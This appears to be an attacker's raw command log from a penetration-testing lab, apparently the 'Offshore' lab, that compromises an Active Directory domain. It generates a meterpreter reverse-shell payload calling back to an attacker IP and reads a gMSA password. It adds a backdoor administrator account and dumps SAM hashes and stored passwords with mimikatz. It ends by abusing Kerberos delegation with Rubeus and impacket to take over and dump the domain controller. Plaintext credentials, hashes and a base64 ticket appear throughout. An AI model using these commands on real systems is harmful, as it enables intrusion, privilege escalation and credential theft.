Logging in as Offshore_adm
proxychains -f proxychains4.conf xfreerdp /u:offshore_adm /p:'Banker!123' /v:172.16.4.31Generating msfvenom
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.15.149 LPORT=4449 -f exe > prompt.exe
Uploading it on the Computer
Read GMSA password
get-adserviceaccount SVC_CLIENT_SEC
get-adserviceaccount SVC_CLIENT_SEC -properties 'msDS-ManagedPassword'
$gmsa = get-adserviceaccount SVC_CLIENT_SEC -properties 'msDS-ManagedPassword'
$mp = $gmsa.'msDS-ManagedPassword'
ConvertFrom-ADManagedPasswordBlob $mp
$secpwd = (ConvertFrom-ADManagedPasswordBlob $mp).SecureCurrentPassword
$cred = New-Object System.Management.Automation.PSCredential "SVC_CLIENT_SEC",$secpwd
Invoke-Command -ComputerName 127.0.0.1 -cred $cred -SCriptBlock {whoami}
Invoke-Command -ComputerName 127.0.0.1 -cred $cred -SCriptBlock {powershell C:\Users\offshore_adm\Desktop\prompt.exe}
PS C:\Users\offshore_adm\Desktop> Invoke-Command -ComputerName 127.0.0.1 -cred $cred -SCriptBlock {powershell C:\Users\offshore_adm\Desktop\prompt.exe}
Enter-PSSession -ComputerName MS02 -cred $cred
net user ipsec TryHarder.123! /add
net localgroup Administrators ipsec /ADD
net localgroup "Remote Desktop Users" ipsec /add
proxychains -f proxychains4.conf xfreerdp /u:ipsec /p:'TryHarder.123!' /v:172.16.4.31
mimikatz # lsadump::sam
Domain : MS02
SysKey : 2bb3b90874b685ecc2dff677a6cb2d3c
Local SID : S-1-5-21-86684712-58618190-611843015
SAMKey : 3b7e5b7801294cb2a81e36f470de5a89
RID : 000001f4 (500)
User : Administrator
Hash NTLM: 7facdc498ed1680c4fd1448319a8c04f
RID : 000001f5 (501)
User : Guest
RID : 000001f7 (503)
User : DefaultAccount
RID : 000003e9 (1001)
User : cleaner
Hash NTLM: 6f97c037d2655e16c9dd6790b143a845
lm - 0: 822a86e87ea5612eb0c48a926ec0a3a8
ntlm- 0: 6f97c037d2655e16c9dd6790b143a845
RID : 000003ea (1002)
User : ipsec
Hash NTLM: ad593e9fb0bf68a7b25651a8b73a1ea1
lm - 0: 7834993eae9d79ce6f25c5819d824b9a
ntlm- 0: ad593e9fb0bf68a7b25651a8b73a1ea1
credman :
[00000000]
* Username : CLIENT\offshore_adm
* Domain : CLIENT\offshore_adm
* Password : Banker!123
[00000001]
* Username : cleaner
* Domain : cleaner
* Password : Cleanup_Cleanup!
[00000002]
* Username : offshore_adm
* Domain : offshore_adm
* Password : Banker!123
[00000003] Primary
* Username : MS02$
* Domain : CLIENT
* NTLM : dc7a49c0c36399ae87f3de623ebab985
* SHA1 : 7598cf051bb29bbd4cb2b794e481f42a16cb9010
ticket is the base64 ticket we get with rubeus's tgtdeleg
doIFvjCCBbqgAwIBBaEDAgEWooIEsTCCBK1hggSpMIIEpaADAgEFoRUbE0NMSUVOVC5PRkZTSE9SRS5DT02iKDAmoAMCAQKhHzAdGwZrcmJ0Z3QbE0NMSUVOVC5PRkZTSE9SRS5DT02jggRbMIIEV6ADAgESoQMCAQKiggRJBIIERaafCinSdci42rKJrwoHFqoLtzZqxGA7kr8imva4D+8lYgTDmTNXyfGXW5YsEbLrxbv6g8gudHsw1N5bw5vfVVnp5plf7JBL4IGCGeuBTf/I4qL54eVLAdRc6HjJ9Pg6LMggu2PQUNZfk0mc55GXagdYm39MEBISFzDhhKKry3WZPWJdEfot9z8wxJA9HFWqVQfFlyiNWqI55q07E65RHGfBfrPhQpqpjUaZO6qO0ddtIfJp8waHFMNSdxEhqv8A+p/S7GA8yMJvPpx/p1QMlQQYsVQF64Fw1yjHMIbDwRfnccnb/WQ7lrgwn71v8/qFfiMu8XVanXiQ+cddrSaZtrwbiFoQOnaVxmM7pZCaiWgkcHHdC06K8aXVZ3lMv1VuviRVtVB+nbl9gVBhpq/dKtqqWuwfFp39LrMbNt2eVnv5VoNcRseM3Xxb6UwAFV1Mu/LxUbgHy9aQWq+Ha08QviY21VSSdtzsX0ACuhpot1FALHSw0zmoARJ0Gu14t7qZlHf6TjA8xOKgFBG8Xa7XU70zSuLBubqnp7ktcBgLsVdOKna9hpfbTgKqwPmfLGTHVRv4GqhytG5cuqI3XwpWvakbBf7tauHDGMI8nUc4tHEakZtpVE/otvR3Gey+ymw6H5xiz8pxL09ktNVHdkaif+zQNTO9jbaMJyAi2HvI+QDsMpXBlf8O6om1oVV43SWVU3gujBMvVeDhlnKZMLDRILQsfaBeb7q363BAv5VHId1YfyeFdUaXgQvHI/oMf1+5BiSIacHqPwf/jJt3jqNda2tKDqJVVEQYSdM8Lp5+mncN8Y/pL9AV6KRZsiOFNa7NSSbndnQ4cqxacuJK+DY7s72TR/XDpcTOJBGp/dPUid+BqDeRkIb41d5ob8RLMLmhGl3U+Bd9WhoGDN6yvFblXVIhXhUNhk+gUY0DQjptMeBpfTZGuN4p+scrBWM42rQBsxV5JJMNl4InJhAM7OuByHG6VFZnT410kEz/ywzC/jmH7CctEcOavzdOUHyoFEyYCO5rlY+jJlPDVoXl3ErSIPi3vb6cT5wxwMSz52qFsRFwFgRfD82aj47CATxT1rYx0hcnvQg9+A8xpVAyh4yWyAdGC4BxntY70PE4yzzNI38euN94nDQhjU+xxcN/BfxdDB3X2dicTzuH0y4k5XncckFi4VqkOQLrV/4+HrAAluRDgMlXFypu9Tg3QQJs/lRi2rBsR6b5naxswSYvSmOuAKsiwu6wGLUlGoLQMtqOzvAYjk3EMVypUIHZCWjaYIqCtgVdkVKrSVmOpEfIcnE3hdgKKF5KI3r931GA5UHSu2lv14PdkkNoOu1lBBKGLmZOPjX/xLO8wPcU6SAfloL2JtGadIb19GiVWtqPTLUJc7IZhivJzb+6H5OkwkceSREEmmytV0jVR7rBnjIOjsEopqe16HY7+RYmshYvDq9hu5aqjijnXV+jgfgwgfWgAwIBAKKB7QSB6n2B5zCB5KCB4TCB3jCB26ArMCmgAwIBEqEiBCB9FCy/oZ6O6dqW8WNu54XKypuU3GTQ9n1SOFkTObNEu6EVGxNDTElFTlQuT0ZGU0hPUkUuQ09NohIwEKADAgEBoQkwBxsFTVMwMiSjBwMFAGChAAClERgPMjAyMzA1MTIxODI1MzlaphEYDzIwMjMwNTEzMDQyMzU4WqcRGA8yMDzMDUxOTE4MjM1OFqoFRsTQ0xJRU5ULk9GRlNIT1JFLkNPTakoMCagAwIBAqEfMB0bBmtyYnRndBsTQ0xJRU5ULk9GRlNIT1JFLkNPTQ==
.\Rubeus.exe s4u /ticket:doIFvjCCBbqgAwIBBaEDAgEWooIEsTCCBK1hggSpMIIEpaADAgEFoRUbE0NMSUVOVC5PRkZTSE9SRS5DT02iKDAmoAMCAQKhHzAdGwZrcmJ0Z3QbE0NMSUVOVC5PRkZTSE9SRS5DT02jggRbMIIEV6ADAgESoQMCAQKiggRJBIIERaafCinSdci42rKJrwoHFqoLtzZqxGA7kr8imva4D+8lYgTDmTNXyfGXW5YsEbLrxbv6g8gudHsw1N5bw5vfVVnp5plf7JBL4IGCGeuBTf/I4qL54eVLAdRc6HjJ9Pg6LMggu2PQUNZfk0mc55GXagdYm39MEBISFzDhhKKry3WZPWJdEfot9z8wxJA9HFWqVQfFlyiNWqI55q07E65RHGfBfrPhQpqpjUaZO6qO0ddtIfJp8waHFMNSdxEhqv8A+p/S7GA8yMJvPpx/p1QMlQQYsVQF64Fw1yjHMIbDwRfnccnb/WQ7lrgwn71v8/qFfiMu8XVanXiQ+cddrSaZtrwbiFoQOnaVxmM7pZCaiWgkcHHdC06K8aXVZ3lMv1VuviRVtVB+nbl9gVBhpq/dKtqqWuwfFp39LrMbNt2eVnv5VoNcRseM3Xxb6UwAFV1Mu/LxUbgHy9aQWq+Ha08QviY21VSSdtzsX0ACuhpot1FALHSw0zmoARJ0Gu14t7qZlHf6TjA8xOKgFBG8Xa7XU70zSuLBubqnp7ktcBgLsVdOKna9hpfbTgKqwPmfLGTHVRv4GqhytG5cuqI3XwpWvakbBf7tauHDGMI8nUc4tHEakZtpVE/otvR3Gey+ymw6H5xiz8pxL09ktNVHdkaif+zQNTO9jbaMJyAi2HvI+QDsMpXBlf8O6om1oVV43SWVU3gujBMvVeDhlnKZMLDRILQsfaBeb7q363BAv5VHId1YfyeFdUaXgQvHI/oMf1+5BiSIacHqPwf/jJt3jqNda2tKDqJVVEQYSdM8Lp5+mncN8Y/pL9AV6KRZsiOFNa7NSSbndnQ4cqxacuJK+DY7s72TR/XDpcTOJBGp/dPUid+BqDeRkIb41d5ob8RLMLmhGl3U+Bd9WhoGDN6yvFblXVIhXhUNhk+gUY0DQjptMeBpfTZGuN4p+scrBWM42rQBsxV5JJMNl4InJhAM7OuByHG6VFZnT410kEz/ywzC/jmH7CctEcOavzdOUHyoFEyYCO5rlY+jJlPDVoXl3ErSIPi3vb6cT5wxwMSz52qFsRFwFgRfD82aj47CATxT1rYx0hcnvQg9+A8xpVAyh4yWyAdGC4BxntY70PE4yzzNI38euN94nDQhjU+xxcN/BfxdDB3X2dicTzuH0y4k5XncckFi4VqkOQLrV/4+HrAAluRDgMlXFypu9Tg3QQJs/lRi2rBsR6b5naxswSYvSmOuAKsiwu6wGLUlGoLQMtqOzvAYjk3EMVypUIHZCWjaYIqCtgVdkVKrSVmOpEfIcnE3hdgKKF5KI3r931GA5UHSu2lv14PdkkNoOu1lBBKGLmZOPjX/xLO8wPcU6SAfloL2JtGadIb19GiVWtqPTLUJc7IZhivJzb+6H5OkwkceSREEmmytV0jVR7rBnjIOjsEopqe16HY7+RYmshYvDq9hu5aqjijnXV+jgfgwgfWgAwIBAKKB7QSB6n2B5zCB5KCB4TCB3jCB26ArMCmgAwIBEqEiBCB9FCy/oZ6O6dqW8WNu54XKypuU3GTQ9n1SOFkTObNEu6EVGxNDTElFTlQuT0ZGU0hPUkUuQ09NohIwEKADAgEBoQkwBxsFTVMwMiSjBwMFAGChAAClERgPMjAyMzA1MTIxODI1MzlaphEYDzIwMjMwNTEzMDQyMzU4WqcRGA8yMDzMDUxOTE4MjM1OFqoFRsTQ0xJRU5ULk9GRlNIT1JFLkNPTakoMCagAwIBAqEfMB0bBmtyYnRndBsTQ0xJRU5ULk9GRlNIT1JFLkNPTQ== /impersonateuser:administrator /domain:client.offshore.com /msdsspn:cifs/dc04.client.offshore.com /dc:dc04.client.offshore.com /ptt
Get-NetComputer ms02 | select name, msds-allowedtodelegateto, useraccountcontrol | fl Get-NetComputer ms02 | Select-Object -ExpandProperty msds-allowedtodelegateto | fl
.\Rubeus.exe s4u /ticket:doIFvjCCBbqgAwIBBaEDAgEWooIEsTCCBK1hggSpMIIEpaADAgEFoRUbE0NMSUVOVC5PRkZTSE9SRS5DT02iKDAmoAMCAQKhHzAdGwZrcmJ0Z3QbE0NMSUVOVC5PRkZTSE9SRS5DT02jggRbMIIEV6ADAgESoQMCAQKiggRJBIIERaafCinSdci42rKJrwoHFqoLtzZqxGA7kr8imva4D+8lYgTDmTNXyfGXW5YsEbLrxbv6g8gudHsw1N5bw5vfVVnp5plf7JBL4IGCGeuBTf/I4qL54eVLAdRc6HjJ9Pg6LMggu2PQUNZfk0mc55GXagdYm39MEBISFzDhhKKry3WZPWJdEfot9z8wxJA9HFWqVQfFlyiNWqI55q07E65RHGfBfrPhQpqpjUaZO6qO0ddtIfJp8waHFMNSdxEhqv8A+p/S7GA8yMJvPpx/p1QMlQQYsVQF64Fw1yjHMIbDwRfnccnb/WQ7lrgwn71v8/qFfiMu8XVanXiQ+cddrSaZtrwbiFoQOnaVxmM7pZCaiWgkcHHdC06K8aXVZ3lMv1VuviRVtVB+nbl9gVBhpq/dKtqqWuwfFp39LrMbNt2eVnv5VoNcRseM3Xxb6UwAFV1Mu/LxUbgHy9aQWq+Ha08QviY21VSSdtzsX0ACuhpot1FALHSw0zmoARJ0Gu14t7qZlHf6TjA8xOKgFBG8Xa7XU70zSuLBubqnp7ktcBgLsVdOKna9hpfbTgKqwPmfLGTHVRv4GqhytG5cuqI3XwpWvakbBf7tauHDGMI8nUc4tHEakZtpVE/otvR3Gey+ymw6H5xiz8pxL09ktNVHdkaif+zQNTO9jbaMJyAi2HvI+QDsMpXBlf8O6om1oVV43SWVU3gujBMvVeDhlnKZMLDRILQsfaBeb7q363BAv5VHId1YfyeFdUaXgQvHI/oMf1+5BiSIacHqPwf/jJt3jqNda2tKDqJVVEQYSdM8Lp5+mncN8Y/pL9AV6KRZsiOFNa7NSSbndnQ4cqxacuJK+DY7s72TR/XDpcTOJBGp/dPUid+BqDeRkIb41d5ob8RLMLmhGl3U+Bd9WhoGDN6yvFblXVIhXhUNhk+gUY0DQjptMeBpfTZGuN4p+scrBWM42rQBsxV5JJMNl4InJhAM7OuByHG6VFZnT410kEz/ywzC/jmH7CctEcOavzdOUHyoFEyYCO5rlY+jJlPDVoXl3ErSIPi3vb6cT5wxwMSz52qFsRFwFgRfD82aj47CATxT1rYx0hcnvQg9+A8xpVAyh4yWyAdGC4BxntY70PE4yzzNI38euN94nDQhjU+xxcN/BfxdDB3X2dicTzuH0y4k5XncckFi4VqkOQLrV/4+HrAAluRDgMlXFypu9Tg3QQJs/lRi2rBsR6b5naxswSYvSmOuAKsiwu6wGLUlGoLQMtqOzvAYjk3EMVypUIHZCWjaYIqCtgVdkVKrSVmOpEfIcnE3hdgKKF5KI3r931GA5UHSu2lv14PdkkNoOu1lBBKGLmZOPjX/xLO8wPcU6SAfloL2JtGadIb19GiVWtqPTLUJc7IZhivJzb+6H5OkwkceSREEmmytV0jVR7rBnjIOjsEopqe16HY7+RYmshYvDq9hu5aqjijnXV+jgfgwgfWgAwIBAKKB7QSB6n2B5zCB5KCB4TCB3jCB26ArMCmgAwIBEqEiBCB9FCy/oZ6O6dqW8WNu54XKypuU3GTQ9n1SOFkTObNEu6EVGxNDTElFTlQuT0ZGU0hPUkUuQ09NohIwEKADAgEBoQkwBxsFTVMwMiSjBwMFAGChAAClERgPMjAyMzA1MTIxODI1MzlaphEYDzIwMjMwNTEzMDQyMzU4WqcRGA8yMDIzMDUxOTE4MjM1OFqoFRsTQ0xJRU5ULk9GRlNIT1JFLkNPTakoMCagAwIBAqEfMB0bBmtyYnRndBsTQ0xJRU5ULk9GRlNIT1JFLkNPTQ== /impersonateuser:administrator /domain:client.offshore.com /msdspn:cifs/DC04.CLIENT>OFFSHORE.COM /dc:DC04.client.offshore.com /ptt
proxychains -f proxychains4.conf impacket-addcomputer -method SAMR -computer-pass 'Summer2018!' -computer-name attackersystem 'client.offshore.com/offshore_adm:Banker!123'
$ComputerSid = Get-DomainComputer rbcdTest -Properties objectsid | Select -Expand objectsid
Get-DomainComputer DC04.client.offshore.com | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
proxychains -f proxychains4.conf impacket-getST -spn 'cifs/DC04' -impersonate Administrator -dc-ip 172.16.4.5 'client.offshore.com/MS02$' -hashes :dc7a49c0c36399ae87f3de623ebab985
proxychains -f proxychains4.conf impacket-psexec client.offshore.com/Administrator@dc04.client.offshore.com -k -no-pass -target-ip 172.16.4.5
proxychains -f proxychains4.conf impacket-getST -spn 'cifs/DC04.client.offshore.com' -impersonate Administrator -dc-ip 172.16.4.5 'client.offshore.com/MS02$' -hashes :dc7a49c0c36399ae87f3de623ebab985
export KRB5CCNAME=Administrator.ccache
proxychains -f proxychains4.conf impacket-psexec -dc-ip 172.16.4.5 -target-ip 172.16.4.5 -no-pass -k client.offshore.com/administrator@DC04.client.offshore.com
proxychains -f proxychains4.conf impacket-secretsdump -dc-ip 172.16.4.5 -target-ip 172.16.4.5 -no-pass -k client.offshore.com/administrator@DC04.client.offshore.com